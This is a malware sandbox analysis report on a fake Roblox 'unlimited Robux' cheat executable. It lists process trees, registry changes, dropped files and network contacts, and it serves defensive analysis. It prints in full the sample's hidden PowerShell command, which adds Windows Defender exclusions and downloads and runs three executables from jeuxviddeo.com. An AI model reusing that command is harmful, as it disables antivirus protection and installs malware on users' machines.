File name: Roblox Launcher Cheat Unlimite Robux.exe

Full analysis: https://app.any.run/tasks/663e8e39-6efe-473e-8262-1e57ca43ed0e
Verdict: Malicious activity
Analysis date: June 09, 2024, 14:59:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: EA759B8CE0F61C4CD5498F11C859BB8B
SHA1: 3316A3389715B208E4694B6627F0324F071FB589
SHA256: 224FD4F3E924DCFDA3D01A2483EE708A55CF99AF39173709EACE310117BB4AF2
SSDEEP: 49152:4y7GRR+kfsBtSspSaMJ8dEREPw2hnUonWPIHRg+AICbMa9RD+bYTEgMWQQP+dApn:4yi3iRpSdYEREPw2hUEYsRglIROJWO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1440)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 928)
  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 928)
      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
    • Starts CMD.EXE for commands execution

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
    • Executable content was dropped or overwritten

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)
    • Reads security settings of Internet Explorer

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Reads the Internet Settings

      • RobloxPlayerLauncher.exe (PID: 2108)
      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • powershell.exe (PID: 1440)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 928)
    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 928)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 928)
    • Reads settings of System Certificates

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 1440)
    • Checks Windows Trust Settings

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Application launched itself

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2232)
    • Adds/modifies Windows certificates

      • RobloxPlayerLauncher.exe (PID: 2108)
  • INFO

    • Checks supported languages

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Reads the computer name

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Checks proxy server information

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Create files in a temporary directory

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Reads the machine GUID from the registry

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Reads the software policy settings

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1440)
    • Disables trace logs

      • powershell.exe (PID: 1440)
    • Creates files or folders in the user directory

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)
    • Process checks computer location settings

      • RobloxPlayerLauncher.exe (PID: 2108)
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:03:03 13:15:57+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.3
CodeSize: 203776
InitializedDataSize: 108032
UninitializedDataSize: -
EntryPoint: 0x1f530
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
Total processes: 47
Monitored processes: 10
Malicious processes: 6
Suspicious processes: 1

Behavior graph

Nodes shown in the graph, in order: start; roblox launcher cheat unlimite robux.exe; cmd.exe (no specs); robloxplayerlauncher.exe; net.exe (no specs); net1.exe (no specs); powershell.exe; robloxplayerlauncher.exe; robloxplayerlauncher.exe; robloxplayerlauncher.exe; roblox launcher cheat unlimite robux.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 928
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\play.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: Roblox Launcher Cheat Unlimite Robux.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1064
CMD: net session
Path: C:\Windows\System32\net.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Net Command
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
PID: 1440
CMD: powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1876
CMD: C:\Windows\system32\net1 session
Path: C:\Windows\System32\net1.exe
Parent process: net.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Net Command
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
PID: 2052
CMD: C:\Users\Public\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\admin\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\admin\AppData\Local\Temp\crashpad_roblox --url=https://upload.crashes.rbxinfra.com/post --annotation=RobloxChannel=Production --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x5ac,0x5b0,0x5b4,0x588,0x5bc,0xe8f954,0xe8f964,0xe8f974
Path: C:\Users\Public\RobloxPlayerLauncher.exe
Parent process: RobloxPlayerLauncher.exe
User: admin
Company: Roblox Corporation
Integrity Level: HIGH
Description: Roblox
Exit code: 0
Version: 1, 6, 0, 416719
Modules
Images
c:\users\public\robloxplayerlauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\advapi32.dll
PID: 2108
CMD: "C:\Users\Public\RobloxPlayerLauncher.exe"
Path: C:\Users\Public\RobloxPlayerLauncher.exe
Parent process: Roblox Launcher Cheat Unlimite Robux.exe
User: admin
Company: Roblox Corporation
Integrity Level: HIGH
Description: Roblox
Exit code: 0
Version: 1, 6, 0, 416719
Modules
Images
c:\users\public\robloxplayerlauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\advapi32.dll
PID: 2232
CMD: "C:\Users\admin\AppData\Local\Temp\RBX-AFD721E9\RobloxPlayerLauncher.exe"
Path: C:\Users\admin\AppData\Local\Temp\RBX-AFD721E9\RobloxPlayerLauncher.exe
Parent process: RobloxPlayerLauncher.exe
User: admin
Company: Roblox Corporation
Integrity Level: HIGH
Description: Roblox
Version: 1, 6, 0, 6280391
Modules
Images
c:\users\admin\appdata\local\temp\rbx-afd721e9\robloxplayerlauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
PID: 2524
CMD: C:\Users\admin\AppData\Local\Temp\RBX-AFD721E9\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\admin\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\admin\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=a5ccf20963e7cd36c8cab2e9c98e72f26ae235b8 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x584,0x588,0x58c,0x560,0x594,0x16d236c,0x16d237c,0x16d238c
Path: C:\Users\admin\AppData\Local\Temp\RBX-AFD721E9\RobloxPlayerLauncher.exe
Parent process: RobloxPlayerLauncher.exe
User: admin
Company: Roblox Corporation
Integrity Level: HIGH
Description: Roblox
Version: 1, 6, 0, 6280391
Modules
Images
c:\users\admin\appdata\local\temp\rbx-afd721e9\robloxplayerlauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
PID: 3976
CMD: "C:\Users\admin\AppData\Local\Temp\Roblox Launcher Cheat Unlimite Robux.exe"
Path: C:\Users\admin\AppData\Local\Temp\Roblox Launcher Cheat Unlimite Robux.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221226540
Modules
Images
c:\users\admin\appdata\local\temp\roblox launcher cheat unlimite robux.exe
c:\windows\system32\ntdll.dll
PID: 4080
CMD: "C:\Users\admin\AppData\Local\Temp\Roblox Launcher Cheat Unlimite Robux.exe"
Path: C:\Users\admin\AppData\Local\Temp\Roblox Launcher Cheat Unlimite Robux.exe
Parent process: explorer.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules
Images
c:\users\admin\appdata\local\temp\roblox launcher cheat unlimite robux.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
Total events: 22 721
Read events: 22 504
Write events: 181
Delete events: 36

Modification events

(PID) Process: (4080) Roblox Launcher Cheat Unlimite Robux.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (4080) Roblox Launcher Cheat Unlimite Robux.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (4080) Roblox Launcher Cheat Unlimite Robux.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

(PID) Process: (4080) Roblox Launcher Cheat Unlimite Robux.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

(PID) Process: (2108) RobloxPlayerLauncher.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (2108) RobloxPlayerLauncher.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (2108) RobloxPlayerLauncher.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (2108) RobloxPlayerLauncher.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation: write
Name: ProxyEnable
Value: 0

(PID) Process: (2108) RobloxPlayerLauncher.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation: delete value
Name: ProxyServer
Value:

(PID) Process: (2108) RobloxPlayerLauncher.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation: delete value
Name: ProxyOverride
Value:
Executable files: 3
Suspicious files: 24
Text files: 6
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 2108
Process: RobloxPlayerLauncher.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Type: binary
MD5:36A85A32F9FCD22819B0C3043E297553
SHA256:833C932277C9FCD706C954974AECB57A518F94D40797B30FABD55A1B88ADAE8E
PID: 2108
Process: RobloxPlayerLauncher.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Type: binary
MD5:9D2D6F0C3382A86BE049486D746EEB22
SHA256:3ED78274080ACF4C25B4A12B6CA1C2F61B1E0C1344C953EF60D6C92350AB0294
PID: 1440
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\0t404fcv.ao0.psm1
Type: binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID: 1440
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\k1am4k4c.cs1.ps1
Type: binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID: 2108
Process: RobloxPlayerLauncher.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Type: binary
MD5:9BF8BF9003171D606190237943705897
SHA256:AE517B06FDDE7BEB2F2BA1A5340CC102AF873C22A505D67671CFD97ED1D239D6
PID: 1440
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
PID: 2108
Process: RobloxPlayerLauncher.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Type: binary
MD5:19A803E4E8345B39783033C00C4A33A1
SHA256:3264EAABE624CED05D868BEBFF016A2979DB25571DABF310FDFC09DD119DCE8B
PID: 2108
Process: RobloxPlayerLauncher.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\application[1].json
Type: binary
MD5:9937FC6D133E6189977662AB80BD4419
SHA256:7850CE8ABF467A258A850278B0C18CDD295A05165367A7C986E6167B464ED6F9
PID: 2108
Process: RobloxPlayerLauncher.exe
Filename: C:\Users\admin\AppData\Local\Temp\crashpad_roblox\settings.dat
Type: binary
MD5:B843C760CF50405C3A0732C0EEC0E68B
SHA256:8CB4EE2371AF9AFDE50EC17B9A059987A57514367FA4587B11928BC99F8522CE
PID: 2108
Process: RobloxPlayerLauncher.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B
Type: binary
MD5:E548CB640B80B7225378032D71DEF995
SHA256:688F5830DC6AE4DAF49D97650FD8DD540D34DDA539631378DD43C15B5078B958
HTTP(S) requests: 5
TCP/UDP connections: 23
DNS requests: 30
Threats: 0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2108
RobloxPlayerLauncher.exe
GET
304
95.140.239.0:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2755af7cbee6f323
unknown
unknown
2108
RobloxPlayerLauncher.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
unknown
2108
RobloxPlayerLauncher.exe
GET
200
104.18.38.233:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
unknown
unknown
2108
RobloxPlayerLauncher.exe
GET
200
104.18.38.233:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEBN9U5yqfDGppDNwGWiEeo0%3D
unknown
unknown
2052
RobloxPlayerLauncher.exe
GET
200
104.18.38.233:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEBN9U5yqfDGppDNwGWiEeo0%3D
unknown
unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
224.0.0.252:5355
unknown
1088
svchost.exe
224.0.0.252:5355
unknown
2108
RobloxPlayerLauncher.exe
2.20.215.226:443
clientsettingscdn.roblox.com
AKAMAI-AS
CH
unknown
1440
powershell.exe
192.236.208.214:443
jeuxviddeo.com
HOSTWINDS
US
unknown
2108
RobloxPlayerLauncher.exe
95.140.239.0:80
ctldl.windowsupdate.com
LLNW
FR
unknown
2108
RobloxPlayerLauncher.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
2052
RobloxPlayerLauncher.exe
2.20.215.226:443
clientsettingscdn.roblox.com
AKAMAI-AS
CH
unknown
2108
RobloxPlayerLauncher.exe
128.116.122.3:443
ephemeralcounters.api.roblox.com
ROBLOX-PRODUCTION
US
unknown

DNS requests

Domain
IP
Reputation
clientsettingscdn.roblox.com
  • 2.20.215.226
unknown
jeuxviddeo.com
  • 192.236.208.214
unknown
ctldl.windowsupdate.com
  • 95.140.239.0
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
ephemeralcounters.api.roblox.com
  • 128.116.122.3
whitelisted
setup.rbxcdn.qq.com
unknown
ocsp.comodoca.com
  • 104.18.38.233
whitelisted
ocsp.usertrust.com
  • 104.18.38.233
whitelisted
clientsettingscdn.roblox.qq.com
unknown
setup.rbxcdn.com
  • 95.101.134.51
whitelisted

Threats

No threats detected
No debug info